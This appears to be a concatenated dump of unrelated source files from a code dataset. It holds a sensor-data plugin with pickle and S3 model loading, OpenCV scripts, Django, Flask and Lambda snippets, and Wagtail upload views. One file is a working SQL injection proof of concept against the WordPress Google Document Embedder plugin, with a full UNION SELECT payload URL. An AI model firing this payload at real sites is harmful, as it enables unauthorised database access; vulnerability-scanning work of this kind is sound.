datum_df_column_tokens_subset = datum_df_column_tokens_metric.split(".")
datum_df_column_tokens_subset.append(datum_df_column_tokens_all[1].split("=")[1])
datum_df_columns_renames_tokens_unit.add(
urllib.unquote_plus(datum_df_column_tokens_all[3].split("=")[1].encode("utf-8")).decode("utf-8"))
datum_df_columns_renames_tokens_metric0.add(datum_df_column_tokens_subset[0])
datum_df_columns_renames_tokens_metric2.add(datum_df_column_tokens_subset[2])
datum_df_columns_renames_tokens_metric2_type.add(
"".join([datum_df_column_tokens_subset[2], datum_df_column_tokens_subset[3]]))
datum_df_columns_renames_tokens_metric3_type.add("".join(datum_df_column_tokens_subset[0:4]))
datum_df_column_tokens_subset.append("".join(["(", " ".join(
[re.search(r"\d+", datum_df_column_tokens_all[2].split("=")[1]).group(),
datum_df_column_tokens_all[2].split("=")[1].replace(
re.search(r"\d+", datum_df_column_tokens_all[2].split("=")[1]).group(), "").title()]), ")"]))
datum_df_columns_renames_order[datum_df_column] = \
(str(DATUM_SCHEMA_METRICS[datum_df_column_tokens_metric]) + datum_df_column_tokens_all[2]) \
if datum_df_column_tokens_all[0].split("=")[1] in DATUM_SCHEMA_METRICS else datum_df_column_tokens_metric
datum_df_columns_renames_tokens[datum_df_column] = datum_df_column_tokens_subset
elif datum_df_column.startswith("data_timestamp"):
datum_df_columns_deletes.append(datum_df_column)
for datum_df_columns_delete in datum_df_columns_deletes:
del datum_df[datum_df_columns_delete]
for datum_df_columns_renames_token in datum_df_columns_renames_tokens:
datum_df_columns_renames_token_subset = []
if len(datum_df_columns_renames_tokens_metric0) > 1:
datum_df_columns_renames_token_subset.append(datum_df_columns_renames_tokens[datum_df_columns_renames_token][0].title())
if len(datum_df_columns_renames_tokens_metric2) == len(datum_df_columns_renames_tokens):
datum_df_columns_renames_token_subset.append(datum_df_columns_renames_tokens[datum_df_columns_renames_token][2].title())
else:
datum_df_columns_renames_tokens_metric2_type_str = datum_df_columns_renames_tokens[datum_df_columns_renames_token][
2].title() if \
(datum_df_columns_renames_tokens[datum_df_columns_renames_token][3] == "point" or
datum_df_columns_renames_tokens[datum_df_columns_renames_token][3] == "integral") else " ".join(
[datum_df_columns_renames_tokens[datum_df_columns_renames_token][2].title(),
datum_df_columns_renames_tokens[datum_df_columns_renames_token][3].title()])
if len(datum_df_columns_renames_tokens_metric2_type) == len(datum_df_columns_renames_tokens):
datum_df_columns_renames_token_subset.append(datum_df_columns_renames_tokens_metric2_type_str)
elif len(datum_df_columns_renames_tokens_metric3_type) == len(datum_df_columns_renames_tokens):
datum_df_columns_renames_token_subset.append(
" ".join([datum_df_columns_renames_tokens[datum_df_columns_renames_token][1].title(),
datum_df_columns_renames_tokens_metric2_type_str]))
else:
datum_df_columns_renames_token_subset.append(
" ".join([datum_df_columns_renames_tokens[datum_df_columns_renames_token][1].title(),
datum_df_columns_renames_tokens_metric2_type_str,
datum_df_columns_renames_tokens[datum_df_columns_renames_token][4]]))
datum_df_columns_renames[datum_df_columns_renames_token] = " ".join(datum_df_columns_renames_token_subset)
if len(datum_df_columns_renames) == 2:
for datum_df_column_old, datum_df_column_new in datum_df_columns_renames.iteritems():
if datum_df_column_old.startswith("data_value_scaled@"):
datum_df_columns_renames[datum_df_column_old] = \
" ".join([datum_df_column_new, datum_df_columns_renames_tokens[datum_df_column_old][4]])
for datum_df_columns_rename in datum_df_columns_renames:
datum_df_columns_renames[datum_df_columns_rename] = datum_df_columns_renames[datum_df_columns_rename]. \
replace("-", " ").replace("1 All Time", "All Time")
datum_df.rename(columns=datum_df_columns_renames, inplace=True)
datum_df_columns_reorder = []
for datum_df_column_old in sorted(datum_df_columns_renames_order,
key=lambda datum_df_column_sort: (datum_df_columns_renames_order[datum_df_column_sort])):
datum_df_columns_reorder.append(datum_df_columns_renames[datum_df_column_old])
datum_df = datum_df[datum_df_columns_reorder]
Plugin.datums_df_title(datum_df, (" & ".join(datum_df_columns_renames_tokens_metric0).title() +
" (" + ", ".join(datum_df_columns_renames_tokens_unit) + ")").replace("-", " "))
return datum_df
def datum_value(self, data, keys=None, default=None, factor=1):
# noinspection PyBroadException
try:
value = data if keys is None else reduce(operator.getitem, keys, data)
if isinstance(value, basestring) and not value:
value = None
if value is None:
value = default
anode.Log(logging.WARN).log("Plugin", "state",
lambda: "[{}] setting value {} to default [{}] from response [{}]".format(
self.name, keys, default, data))
return value if not isinstance(value, numbers.Number) else int(value * factor)
except Exception as exception:
anode.Log(logging.ERROR).log("Plugin", "error",
lambda: "[{}] setting value {} to default [{}] from response [{}] due to error [{}]".format(
self.name, keys, default, data, exception), exception)
return None if default is None else int(default * factor)
def datums_store(self):
log_timer = anode.Log(logging.INFO).start()
for datum_metric in self.datums:
for datum_type in self.datums[datum_metric]:
for datum_unit in self.datums[datum_metric][datum_type]:
for datum_bin in self.datums[datum_metric][datum_type][datum_unit]:
if DATUM_QUEUE_HISTORY in self.datums[datum_metric][datum_type][datum_unit][datum_bin]:
self.datum_merge_buffer_history(
self.datums[datum_metric][datum_type][datum_unit][datum_bin][DATUM_QUEUE_BUFFER],
self.datums[datum_metric][datum_type][datum_unit][datum_bin][DATUM_QUEUE_HISTORY])
else:
self.datums[datum_metric][datum_type][datum_unit][datum_bin][DATUM_QUEUE_BUFFER].clear()
if len(self.datums) > 0:
self.pickled_put(os.path.join(self.config["db_dir"], "anode"), os.path.join(
"asystem", "anode", self.name, "model/pickle/pandas/none/amodel_version=" + APP_VERSION,
"amodel_model=" + APP_MODEL_VERSION, self.name + ".pkl"), self.datums, True)
metrics_count = sum(len(units)
for metrics in self.datums.values()
for types in metrics.values()
for units in types.values())
datums_count = sum(0 if DATUM_QUEUE_HISTORY not in bins else (
sum(len(partitions["data_df"].index) for partitions in bins[DATUM_QUEUE_HISTORY].values()))
for metrics in self.datums.values()
for types in metrics.values()
for units in types.values()
for bins in units.values())
log_timer.log("Plugin", "timer",
lambda: "[{}] state stored [{}] metrics and [{}] datums".format(self.name, metrics_count, datums_count),
context=self.datums_store)
def datums_load(self):
log_timer = anode.Log(logging.INFO).start()
metrics_count = 0
datums_pickled = self.pickled_get(os.path.join(self.config["db_dir"], "anode"), name=self.name, cache=False)
model_version = int(APP_MODEL_VERSION)
while model_version >= 1000 and self.name in datums_pickled and str(model_version) not in datums_pickled[self.name]:
model_version -= 1
self.datums = datums_pickled[self.name][str(model_version)][1] \
if self.name in datums_pickled and str(model_version) in datums_pickled[self.name] else {}
metrics_count = sum(len(units)
for metrics in self.datums.values()
for types in metrics.values()
for units in types.values())
for datum_metric in self.datums:
for datum_type in self.datums[datum_metric]:
for datum_unit in self.datums[datum_metric][datum_type]:
for datum_bin in self.datums[datum_metric][datum_type][datum_unit]:
self.datums[datum_metric][datum_type][datum_unit][datum_bin][DATUM_QUEUE_BUFFER].clear()
datums_count = sum(0 if DATUM_QUEUE_HISTORY not in bins else (
sum(len(partitions["data_df"].index) for partitions in bins[DATUM_QUEUE_HISTORY].values()))
for metrics in self.datums.values()
for types in metrics.values()
for units in types.values()
for bins in units.values())
log_timer.log("Plugin", "timer",
lambda: "[{}] state loaded [{}] metrics and [{}] datums from [{}]".format(
self.name, metrics_count, datums_count, (
self.name + "-" + APP_MODEL_VERSION + "-" +
datums_pickled[self.name][APP_MODEL_VERSION][
0]) if self.name in datums_pickled and APP_MODEL_VERSION in datums_pickled[
self.name] else ""),
context=self.datums_store)
def get_time(self):
return calendar.timegm(time.gmtime()) if not self.is_clock else (
(1 if self.reactor.seconds() == 0 else int(self.reactor.seconds())) +
self.get_time_period(self.time_boot, 24 * 60 * 60))
def get_time_period(self, timestamp, period):
return period if period > timestamp else \
((timestamp + self.time_tmz_offset) - (timestamp + self.time_tmz_offset) % period - self.time_tmz_offset)
def pickled_status(self, store, path, model_lower=None, model_upper=None):
log_timer = anode.Log(logging.INFO).start()
path_dirty = False
path_filtered = True
pickle_metadata = re.search(PICKLE_PATH_REGEX, path)
if pickle_metadata is not None:
if (model_lower is None or model_lower <= pickle_metadata.group(4)) and \
(model_upper is None or model_upper >= pickle_metadata.group(4)):
path_filtered = False
pickle_cache = self.pickled_get(store, name=pickle_metadata.group(1), model=pickle_metadata.group(4))
path_dirty = pickle_metadata.group(3).endswith("-SNAPSHOT") or \
pickle_metadata.group(1) not in pickle_cache or \
pickle_metadata.group(4) not in pickle_cache[pickle_metadata.group(1)] or \
Plugin.compare_version(pickle_metadata.group(3),
pickle_cache[pickle_metadata.group(1)][pickle_metadata.group(4)][0]) > 0
log_timer.log("Plugin", "timer", lambda: "[{}] status pickled [{}filtered, {}dirty] [{}]".format(
self.name, "" if path_filtered else "not ", "" if path_dirty else "not ", path), context=self.pickled_status)
return path_filtered, path_dirty
def pickled_put(self, store, path, library, pickle=False):
log_timer = anode.Log(logging.INFO).start()
pickle_path = None
pickle_metadata = re.search(PICKLE_PATH_REGEX, path)
if pickle_metadata is not None:
pickle_path = os.path.join(store, pickle_metadata.group(1), "model/pickle", pickle_metadata.group(2),
"none/amodel_version=" + pickle_metadata.group(3), "amodel_model=" + pickle_metadata.group(4),
pickle_metadata.group(1) + ".pkl")
not os.path.exists(os.path.dirname(pickle_path)) and os.makedirs(os.path.dirname(pickle_path))
if pickle:
if pickle_metadata.group(2) == "pandas":
pandas.to_pickle(library, pickle_path)
else:
raise Exception("Unknown pickle write format [{}]".format(pickle_metadata[0]))
else:
with open(pickle_path, "wb") as pickle_file:
pickle_file.write(library)
self.pickled_get(store, path=path, warm=True)
log_timer.log("Plugin", "timer", lambda: "[{}] put pickled [{}] to [{}]".format(self.name, "-".join(
"" if pickle_metadata is None else pickle_metadata.group(3, 2, 1)), "" if pickle_path is None else ("file://" + pickle_path)),
context=self.pickled_put)
return pickle_path
def pickled_get(self, store, path=None, name=None, model=None, warm=False, cache=True, flush=False):
log_timer = anode.Log(logging.INFO).start()
if flush and os.path.isdir(store):
shutil.rmtree(store)
os.makedirs(store)
if cache:
if store not in PICKLES_CACHE:
PICKLES_CACHE[store] = {}
pickle_cache = PICKLES_CACHE[store]
else:
pickle_cache = {}
if path is not None:
pickle_metadata = re.search(PICKLE_PATH_REGEX, path)
if pickle_metadata is not None:
name = pickle_metadata.group(1)
model = pickle_metadata.group(4)
if not cache or warm:
pickle_metadata_cache = {}
for root_dir, parent_dirs, file_names in os.walk(store):
for file_name in file_names:
file_path = os.path.join(root_dir, file_name)
pickle_metadata = re.search(PICKLE_PATH_REGEX, file_path)
if pickle_metadata is not None:
if (name is None or name == pickle_metadata.group(1)) and (model is None or model == pickle_metadata.group(4)):
if APP_VERSION.endswith("-SNAPSHOT") or not pickle_metadata.group(3).endswith("-SNAPSHOT"):
if pickle_metadata.group(1) not in pickle_metadata_cache:
pickle_metadata_cache[pickle_metadata.group(1)] = {}
if pickle_metadata.group(4) not in pickle_metadata_cache[pickle_metadata.group(1)]:
pickle_metadata_cache[pickle_metadata.group(1)][pickle_metadata.group(4)] = {}
pickle_metadata_cache[pickle_metadata.group(1)][pickle_metadata.group(4)][pickle_metadata.group(3)] = \
(pickle_metadata.group(2), file_path)
for pickle_name in pickle_metadata_cache:
for pickle_model in pickle_metadata_cache[pickle_name]:
pickle_version = sorted(pickle_metadata_cache[pickle_name][pickle_model].keys(), cmp=Plugin.compare_version)[-1]
pickle_metadata = pickle_metadata_cache[pickle_name][pickle_model][pickle_version]
pickle_cache[pickle_name] = pickle_cache[pickle_name] if pickle_name in pickle_cache else {}
if pickle_metadata[0] == "pandas":
pickle_cache[pickle_name][pickle_model] = (pickle_version, pandas.read_pickle(pickle_metadata[1]))
elif pickle_metadata[0] == "joblib":
unpickled = joblib.load(pickle_metadata[1])
unpickled['execute'] = dill.load(StringIO(unpickled['execute'].getvalue()))
pickle_cache[pickle_name][pickle_model] = (pickle_version, unpickled)
else:
raise Exception("Unknown pickle read format [{}]".format(pickle_metadata[0]))
anode.Log(logging.INFO).log("Plugin", "timer", lambda: "[{}] read pickled [{}] using [{}]".format(
self.name, pickle_name + "-" + pickle_model + "-" + pickle_version, pickle_metadata[0]))
pickle_cache = pickle_cache if name is None else ({name: pickle_cache[name]} if name in pickle_cache else {name: {}})
pickle_cache = pickle_cache if model is None else ({name: {model: pickle_cache[name][model]}}
if (name in pickle_cache and model in pickle_cache[name]) else {name: {}})
pickle = pickle_cache[name] if name in pickle_cache else {}
log_timer.log("Plugin", "timer", lambda: "[{}] got pickled [{}]".format(self.name, ", ".join(
[name + "-{}-{}".format(model, pickle[model][0]) for model in pickle.keys()])), context=self.pickled_get)
return pickle_cache
@staticmethod
def compare_version(this, that):
if this is not None and that is not None and \
(this.endswith("-SNAPSHOT") or that.endswith("-SNAPSHOT")) and \
this.replace("-SNAPSHOT", "") == that.replace("-SNAPSHOT", ""):
return 0 if this == that else (1 if that.endswith("-SNAPSHOT") else -1)
else:
return 0 if this == that else (1 if this > that else -1)
@staticmethod
def datum_field_swap(field):
return "" if field is None else "".join([ESCAPE_SWAPS.get(field_char, field_char) for field_char in field])
@staticmethod
def datum_version_encode(version, base=100000000):
return (-1 if version.endswith("-SNAPSHOT") else 1) * ((int(re.sub("[^0-9]", "", version)) - base + 1) if (
int(re.sub("[^0-9]", "", version)) >= base) else int(re.sub("[^0-9]", "", version)))
@staticmethod
def datum_field_encode(field):
field_encoded = urllib.quote_plus(Plugin.datum_field_swap(field))
for escaped, unescaped in ESCAPE_SEQUENCES.iteritems():
field_encoded = field_encoded.replace(unescaped, escaped)
return field_encoded
@staticmethod
def datum_field_decode(field):
fields_decoded = field.split("__")
for index, field in enumerate(fields_decoded):
for escaped, unescaped in ESCAPE_SEQUENCES.iteritems():
fields_decoded[index] = fields_decoded[index].replace(escaped, unescaped)
field_decoded = urllib.unquote_plus(Plugin.datum_field_swap("_".join(fields_decoded)))
return field_decoded if isinstance(field_decoded, unicode) else field_decoded
@staticmethod
def get_seconds(scalar, unit):
if unit == "second":
return scalar
elif unit == "minute":
return scalar * 60
elif unit == "hour":
return scalar * 60 * 60
elif unit == "day":
return scalar * 60 * 60 * 24
elif unit == "day_Dtime":
return scalar * 60 * 60 * 24
elif unit == "night_Dtime":
return scalar * 60 * 60 * 24
elif unit == "month":
return scalar * 60 * 60 * 24 * 30.42
elif unit == "year":
return scalar * 60 * 60 * 24 * 365
elif unit == "all_Dtime":
return scalar * -1
else:
raise Exception("Unknown time unit [{}]".format(unit))
@staticmethod
def get(parent, plugin_name, config, reactor):
plugin = getattr(import_module("anode.plugin") if hasattr(anode.plugin, plugin_name.title()) else
import_module("anode.plugin." + plugin_name), plugin_name.title())(parent, plugin_name, config, reactor)
anode.Log(logging.INFO).log("Plugin", "state", lambda: "[{}] initialised".format(plugin_name))
return plugin
__metaclass__ = abc.ABCMeta
def __init__(self, parent, name, config, reactor):
self.has_poll = getattr(self, "_poll", None) is not None
self.has_push = getattr(self, "_push", None) is not None
self.is_clock = isinstance(reactor, Clock)
self.anode = parent
self.name = name
self.config = config
self.reactor = reactor
self.datums = {}
self.time_seen = None
self.time_boot = calendar.timegm(time.gmtime())
time_local = time.localtime()
self.time_tmz_offset = calendar.timegm(time_local) - calendar.timegm(time.gmtime(time.mktime(time_local)))
self.datums_buffer_batch = BUFFER_BATCH_DEFAULT if ("buffer_ticks" not in self.config or self.config["buffer_ticks"] < 1) \
else self.config["buffer_ticks"]
self.datums_load()
PICKLE_PATH_REGEX = ".*/[a-zA-z]*/([a-zA-z]*)/model/pickle/([a-zA-z]*)/none/" \
"amodel_version=([1-9][0-9]\.[0-9]{3}.[0-9]{4}.*)/amodel_model=([1-9][0-9]{3})/.*\.pkl"
ID_BYTE = '{s:0^12}'.format(s=format(get_mac(), "x")).decode("hex")
ID_HEX = ID_BYTE.encode("hex").upper()
ID_HEX_STRING = ':'.join(a + b for a, b in zip(ID_HEX[::2], ID_HEX[1::2]))
ID_BASE64 = base64.b64encode(str(ID_BYTE))
SVG_EMPTY = """<?xml version="1.0" encoding="utf-8" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
</svg>"""
ESCAPE_SWAPS = {
"_": ".",
".": "_"
}
ESCAPE_SEQUENCES = {
"__": "_",
"_X": ".",
"_D": "-",
"_P": "%"
}
HTTP_TIMEOUT = 10
BUFFER_BATCH_DEFAULT = 60
SERIALISATION_BATCH = 1000
SERIALISATION_BATCH_SLEEP = 0.3
DATUM_TIMESTAMP_MIN = -2211753600
DATUM_TIMESTAMP_MAX = 32500915200
DATUM_QUEUE_MIN = "min"
DATUM_QUEUE_MAX = "max"
DATUM_QUEUE_LAST = "last"
DATUM_QUEUE_PUBLISH = "publish"
DATUM_QUEUE_BUFFER = "buffer"
DATUM_QUEUE_HISTORY = "history"
DATUM_LOCATION_DEFAULT = "Home"
DATUM_LOCATIONS = {
"Ada",
"Dining",
"Edwin",
"Kitchen",
"Laundry",
"Lounge",
"Office",
"Pantry",
"Parents",
"Ensuite",
"Bathroom",
"Utility",
"Shed",
"Basement",
"Deck",
"Roof",
}
PICKLES_CACHE = {}
DATUM_SCHEMA_TO_ASCII = {}
DATUM_SCHEMA_FROM_ASCII = {}
DATUM_SCHEMA_FILE = open(os.path.dirname(__file__) + "/../avro/datum.avsc", "rb").read()
DATUM_SCHEMA_JSON = json.loads(DATUM_SCHEMA_FILE)
DATUM_SCHEMA_AVRO = avro.schema.parse(DATUM_SCHEMA_FILE)
DATUM_SCHEMA_MODEL = {DATUM_SCHEMA_JSON["fields"][i]["name"].encode("utf-8"): i * 10 for i in range(len(DATUM_SCHEMA_JSON["fields"]))}
DATUM_SCHEMA_METRICS = {Plugin.datum_field_decode(DATUM_SCHEMA_JSON["fields"][4]["type"]["symbols"][i].encode("utf-8")):
i * 10 for i in range(len(DATUM_SCHEMA_JSON["fields"][4]["type"]["symbols"]))}
PUBLISH_METADATA_CACHE = {}
PUBLISH_BATCH_TOPIC = "/anode_version=" + APP_VERSION + "/anode_id=" + ID_HEX + "/anode_model=" + APP_MODEL_VERSION
class ModelPull(Plugin):
def poll(self):
self.http_get(self.config["model_pull_region"], self.config["model_pull_bucket"], "/",
"list-type=2&max-keys=1000000&prefix=asystem", self.list_models)
def http_get(self, region, bucket, path, params, callback):
host = bucket + ".s3-" + region + ".amazonaws.com"
url = "http://" + host + path + "?" + params
payload = auth.compute_hashed_payload(b"")
timestamp = datetime.datetime.utcnow()
headers = {"host": host, "x-amz-content-sha256": payload, "x-amz-date": timestamp.strftime(auth.ISO8601_FMT)}
headers["Authorization"] = auth.compute_auth_header(headers, "GET", timestamp, region, bucket, path, params, payload,
os.environ["AWS_ACCESS_KEY"], os.environ["AWS_SECRET_KEY"])
connection_pool = self.config["pool"] if "pool" in self.config else None
treq.get(url, headers=headers, timeout=HTTP_TIMEOUT, pool=connection_pool).addCallbacks(
lambda response, url=url, callback=callback: self.http_response(response, url, callback),
errback=lambda error, url=url: anode.Log(logging.ERROR).log("Plugin", "error",
lambda: "[{}] error processing HTTP GET [{}] with [{}]".format(
self.name, url, error.getErrorMessage())))
def http_response(self, response, url, callback):
if response.code == 200:
treq.content(response).addCallbacks(callback, callbackKeywords={"url": url})
else:
anode.Log(logging.ERROR).log("Plugin", "error",
lambda: "[{}] error processing HTTP response [{}] with [{}]".format(self.name, url, response.code))
def list_models(self, content, url):
log_timer = anode.Log(logging.DEBUG).start()
try:
for key_remote in xmltodict.parse(content)["ListBucketResult"]["Contents"]:
path_remote = "s3://" + self.config["model_pull_bucket"] + "/" + key_remote["Key"].encode("utf-8")
path_status = self.pickled_status(os.path.join(self.config["db_dir"], "amodel"), path_remote)
if not path_status[0] and path_status[1]:
self.http_get(self.config["model_pull_region"], self.config["model_pull_bucket"], "/" +
path_remote.replace("s3://" + self.config["model_pull_bucket"] + "/", ""), "", self.pull_model)
elif not path_status[0]:
self.verified_model(path_remote)
except Exception as exception:
anode.Log(logging.ERROR).log("Plugin", "error", lambda: "[{}] error [{}] processing response:\n{}"
.format(self.name, exception, content), exception)
log_timer.log("Plugin", "timer", lambda: "[{}]".format(self.name), context=self.list_models)
def pull_model(self, content, url):
log_timer = anode.Log(logging.DEBUG).start()
try:
path_remote = url[:-1]
self.pickled_put(os.path.join(self.config["db_dir"], "amodel"), path_remote, content)
self.verified_model(path_remote)
except Exception as exception:
anode.Log(logging.ERROR).log("Plugin", "error", lambda: "[{}] error [{}] processing binary response of length [{}]"
.format(self.name, exception, len(content)), exception)
log_timer.log("Plugin", "timer", lambda: "[{}]".format(self.name), context=self.pull_model)
def verified_model(self, path=None):
anode.Log(logging.INFO).log("Plugin", "state", lambda: "[{}] verified model [{}]".format(self.name, path))
def __init__(self, parent, name, config, reactor):
super(ModelPull, self).__init__(parent, name, config, reactor)
self.pickled_get(os.path.join(self.config["db_dir"], "amodel"), flush=True)
| StarcoderdataPython |
60342 | <reponame>csadsl/poc_exp
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#__Author__ = ko0zhi
#__Service_ = Wordpress
#__Refer___ = http://www.beebeeto.com/pdb/poc-2014-0174/
#___Type___ = sql
#___name___ = http://www.exploit-db.com/exploits/35447/
'''
Wordpress插件漏洞, Google Document Embedder漏洞
'''
def assign(service, arg):
if service == "wordpress":
return True, arg
def audit(arg):
payload = "wp-content/plugins/google-document-embedder/~view.php?embedded=1&gpid=0%20UNION%20SELECT%201,2,3,%20CONCAT(CAST(CHAR(97,58,49,58,123,115,58,54,58,34,118,119,95,99,115,115,34,59,115,58)%20as%20CHAR),%20LENGTH(md5(1234)),%20CAST(CHAR(58,%2034)%20as%20CHAR),%20md5(1234),%20CAST(CHAR(34,%2059,%20125)%20as%20CHAR))"
url = arg + payload
code, head, res, errcode, _ = curl.curl('%s' % url)
if code ==200 and '77596ce7097c5f353cffcc865487d9e2' in res:
security_hole(url)
if __name__ == '__main__':
from dummy import *
audit(assign('wordpress', 'http://www.example.com/')[1]) | StarcoderdataPython |
134448 | import cv2
import numpy as np
def filterClusters(clusters):
# Remove things with angle far from median
for i in range(len(clusters)):
cluster = clusters[i]
if len(cluster) > 9:
median = np.median([facelet[2] for facelet in cluster])
clusters[i] = [facelet for facelet in cluster if abs(facelet[2] - median) < 10]
# Figure out removing which object minimizes total distance from center, until there are 9 objects
for cluster in clusters:
while len(cluster) > 9:
maxSolidity = 0
minIndex = 0
for index in range(len(cluster)):
c = np.vstack(cluster[i][0] for i in range(len(cluster)) if i != index)
area = cv2.contourArea(c)
hull = cv2.convexHull(c)
hull_area = cv2.contourArea(hull)
solidity = float(area)/hull_area
if area < maxSolidity:
maxSolidity = solidity
minIndex = index
del(cluster[minIndex]) | StarcoderdataPython |
43451 | <filename>api/notificationserializer.py
from rest_framework import serializers
from shared.models import Notification
class NotificationSerializer(serializers.Serializer):
title = serializers.CharField(max_length=60)
content = serializers.CharField()
date = serializers.DateTimeField()
source = serializers.CharField(max_length=50)
| StarcoderdataPython |
136105 | <reponame>imankulov/flask-boilerplate<gh_stars>0
"""
Flask application.
The module is used to initialize the main project: load configuration, attach
blueprints and initialize services.
What app.py can import?
-----------------------
Services, configuration, and everything that is needed to initialize blueprints,
including controllers and models inside apps. In other words, app.py depends on
a lot of things in the project.
Who can import app.py?
----------------------
The module is not imported from anywhere except from a WSGI server in
production, and conftests.py for pytest.
"""
from typing import Any, Optional
from flask import Flask
from roman_discovery.flask import discover_flask
def app(extra_config: Optional[dict[str, Any]] = None) -> Flask:
"""
Initialize and return a Flask application.
extra_config: a dict with extra configuration options, that need to be applied
to the application before initializing.
"""
flask_app = Flask(__name__, instance_relative_config=True)
flask_app.config.from_object("{{ cookiecutter.project_slug }}.config")
if extra_config:
flask_app.config.from_mapping(extra_config)
# Configure services and extensions
discover_flask("{{ cookiecutter.project_slug }}", flask_app)
return flask_app
| StarcoderdataPython |
3208734 | import os
import logging
import json
import boto3
logger = logging.getLogger()
logger.setLevel(logging.INFO)
client = boto3.client('lambda')
code_pipeline = boto3.client('codepipeline')
def put_job_success(job, message):
logger.info('Putting job success')
logger.info(message)
code_pipeline.put_job_success_result(jobId=job)
def put_job_failure(job, message):
logger.info('Putting job failure')
logger.info(message)
code_pipeline.put_job_failure_result(
jobId=job,
failureDetails={'message': message, 'type': 'JobFailed'},
)
def continue_job_later(job, message):
continuation_token = json.dumps({'previous_job_id': job})
logger.info('Putting job continuation')
logger.info(message)
code_pipeline.put_job_success_result(
jobId=job,
continuationToken=continuation_token,
)
def handler(event, context):
job_id = "Unknoun"
try:
logger.info("Getting job details")
job_id = event['CodePipeline.job']['id']
job_data = event['CodePipeline.job']['data']
logger.info("Getting user parameters")
user_parameters = job_data['actionConfiguration']['configuration']['UserParameters']
params = json.loads(user_parameters)
bucket = params['sourceBucket']
key = params['sourceKey']
function_name = params["functionName"]
logger.info("Updating lambda source")
response = client.update_function_code(
FunctionName=function_name,
S3Bucket=bucket,
S3Key=key,
)
put_job_success(job_id, 'Source Updated')
except Exception as e:
logger.info(str(e))
put_job_failure(job_id, 'Function exception: ' + str(e))
logger.info("Complete")
return "Complete."
| StarcoderdataPython |
3387657 | <gh_stars>0
import cv2
import numpy as np
# Функция для вывода изображения на экран
def viewImage(image, window_name='window name'):
cv2.imshow(window_name, image)
cv2.waitKey(0)
cv2.destroyAllWindows()
# Считываем и визуализируем изображения
cone = cv2.imread('2.png')
road = cv2.imread('1.png')
viewImage(cone, 'cone')
viewImage(road, 'road')
# Переводим их в оттенки серого
gray_cone = cv2.cvtColor(cone, cv2.COLOR_BGR2GRAY)
gray_road = cv2.cvtColor(road, cv2.COLOR_BGR2GRAY)
viewImage(gray_road)
# Бинаризуем изображение конуса
ret, threshold_cone = cv2.threshold(gray_cone, 150, 255, cv2.THRESH_BINARY)
viewImage(threshold_cone)
# Бинаризуем изображение дороги
road_edges = cv2.Canny(gray_road, 125, 200)
viewImage(road_edges)
# Ищем конус на первоначальной картинке
cone_hsv = cv2.cvtColor(cone, cv2.COLOR_BGR2HSV)
lower_or = np.array([8, 100, 100])
upper_or = np.array([17, 255, 255])
mask = cv2.inRange(cone_hsv, lower_or, upper_or)
res = cv2.bitwise_and(cone_hsv, cone_hsv, mask=mask)
viewImage(mask)
#viewImage(res)
# Контуры
contours, h = cv2.findContours(mask, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
cv2.drawContours(cone, contours, 2, (255, 0, 0), 5)
viewImage(cone)
contours, h = cv2.findContours(road_edges, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
print(len(contours))
# контуры с индексами 14, 16 - внутренние края полосы
cv2.drawContours(road, contours, -1, (255, 0, 0), 5)
viewImage(road)
| StarcoderdataPython |
1720078 | from __future__ import unicode_literals
import os
from django.shortcuts import get_object_or_404, redirect, render
from django.urls import reverse
from django.utils.translation import ugettext as _
from django.views.decorators.vary import vary_on_headers
from django.core.files import File
from wagtail import VERSION as WAGTAIL_VERSION
from wagtail.admin import messages
from wagtail.core.models import Collection
from wagtail.search.backends import get_search_backends
from .forms import get_media_form
from .models import get_media_model
from .permissions import permission_policy
from .utils import paginate, chunk_uploaded_file, upload_path
if WAGTAIL_VERSION < (2, 5):
from wagtail.admin.forms import SearchForm
else:
from wagtail.admin.forms.search import SearchForm
if WAGTAIL_VERSION < (2, 9):
from wagtail.admin.utils import PermissionPolicyChecker, permission_denied, popular_tags_for_model
else:
from wagtail.admin.auth import PermissionPolicyChecker, permission_denied
from wagtail.admin.models import popular_tags_for_model
permission_checker = PermissionPolicyChecker(permission_policy)
@permission_checker.require_any('add', 'change', 'delete')
@vary_on_headers('X-Requested-With')
def index(request):
Media = get_media_model()
# Get media files (filtered by user permission)
media = permission_policy.instances_user_has_any_permission_for(
request.user, ['change', 'delete']
)
# Ordering
if 'ordering' in request.GET and request.GET['ordering'] in ['title', '-created_at']:
ordering = request.GET['ordering']
else:
ordering = '-created_at'
media = media.order_by(ordering)
# Filter by collection
current_collection = None
collection_id = request.GET.get('collection_id')
if collection_id:
try:
current_collection = Collection.objects.get(id=collection_id)
media = media.filter(collection=current_collection)
except (ValueError, Collection.DoesNotExist):
pass
# Search
query_string = None
if 'q' in request.GET:
form = SearchForm(request.GET, placeholder=_("Search media files"))
if form.is_valid():
query_string = form.cleaned_data['q']
media = media.search(query_string)
else:
form = SearchForm(placeholder=_("Search media"))
# Pagination
paginator, media = paginate(request, media)
collections = permission_policy.collections_user_has_any_permission_for(
request.user, ['add', 'change']
)
if len(collections) < 2:
collections = None
# Create response
if request.is_ajax():
return render(request, 'chunked_media/media/results.html', {
'ordering': ordering,
'media_files': media,
'query_string': query_string,
'is_searching': bool(query_string),
})
else:
return render(request, 'chunked_media/media/index.html', {
'ordering': ordering,
'media_files': media,
'query_string': query_string,
'is_searching': bool(query_string),
'search_form': form,
'popular_tags': popular_tags_for_model(Media),
'user_can_add': permission_policy.user_has_permission(request.user, 'add'),
'collections': collections,
'current_collection': current_collection,
})
@permission_checker.require('add')
def add(request, media_type):
Media = get_media_model()
MediaForm = get_media_form(Media)
if request.POST:
media = Media(uploaded_by_user=request.user, type=media_type)
form = MediaForm(request.POST, request.FILES, instance=media, user=request.user)
if form.is_valid():
try:
messages.info(request, _(f"'{media.title.capitalize()}' is being processed"))
chunk_upload_path = upload_path(media.title)
messages.info(request, _(f"chunk_upload_path = '{chunk_upload_path}'"))
uploaded_file = chunk_uploaded_file(request.FILES['file'], media.filename, chunk_upload_path)
print(f'after uploaded file. uploaded_file Var is {uploaded_file}')
# May need to make the chunk uploaded file method save into an intermediary model for this to work
form.instance.file = File(uploaded_file, os.path.basename(uploaded_file.path))
print('after form.instance.file. Above form.save. About to form.save()')
form.save()
print('form saved!')
